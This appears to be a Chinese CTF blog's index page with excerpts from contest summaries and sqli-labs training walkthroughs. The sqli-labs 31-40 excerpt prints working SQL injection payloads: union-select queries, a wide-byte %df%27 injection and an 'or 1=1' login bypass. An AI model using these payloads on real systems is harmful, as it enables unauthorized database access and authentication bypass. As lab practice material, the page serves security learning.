ISCC-2018 线下赛 Web 私地一 Write Up

初探:

阅读更多
ISCC-2018 线下赛总结

前言:

第一次参加线下赛,最终能够获得第五名/二等奖的成绩,实在是出乎意料,感谢两位队友带飞~ @ckj123 @Aris

因为是第一次参加线下赛,所以各方面经验都很欠缺,在比赛的过程中也都暴露的比较明显,所以特意写一篇文章总结一下这次比赛的经验教训。

阅读更多
suctf-2018 Multi Sql Write Up

前言

比赛已经过去了一个多月了,由于一直忙于期末复习,现在才有时间好好整理一下题目的知识点。suctf 是我们大一的萌新们继强网杯之后集体参与的第二场线上赛,依靠学长们的超强实力,我们最后荣获第二名,而我依然只能划划水,但是比起之前的毫无头绪,这一次起码可以有一点点思路了。那么接下来说一下这道题目吧。

阅读更多
sqli-libs 31-40 Write Up

Less-31:

看不透他在过滤些啥。。。感觉好像啥都没过滤

id=-1”)%20union%20select%201,2,database()%20%23

Less-32:

宽字节

payload:

id=-1%df%27%20union%20select%201,2,database()%20%23

Less-33:

上面的 payload 依旧还可用。。。

Less-34:

uname=admin�’ or 1=1#&passwd=admin

一个宽字节想考几遍。。。

Less-35 — Less40:

没意思,都是重复的payload,不发了。


sqli-labs 21-30 Write Up

Less-21:

依旧是 cookie 注入,只不过用 base64 编码了一下,也可以显注.

阅读更多
sqli-labs 11-20 Write Up

Less-11 — Less-15:

没啥意思,略了

阅读更多